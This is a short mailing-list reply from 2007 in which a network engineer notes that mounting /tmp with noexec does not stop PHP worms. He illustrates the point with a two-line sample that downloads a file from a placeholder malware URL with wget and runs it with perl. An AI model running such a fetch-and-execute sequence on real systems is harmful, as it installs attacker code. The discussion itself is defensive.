Print

Print


On Tue, 2 Jan 2007, Jan Hendrik Grahl wrote:

> A little late, but maybe someone else finds this interesting, too.
> Another hint I read about once was to remove executable functionality from
> places where it isn't needed. In this example you could have /tmp on a
> separate partition and enable the nosuid,noexec flags (see man mount).

Thats good practice, but won't stop things like PHP worms which 
effectively do:

wget -O /tmp/a $malwareurl
perl /tmp/a

----------------------------------------------------------------------
  Jon Lewis                   |  I route
  Senior Network Engineer     |  therefore you are
  Atlantic Net                |
_________ http://www.lewis.org/~jlewis/pgp for PGP public key_________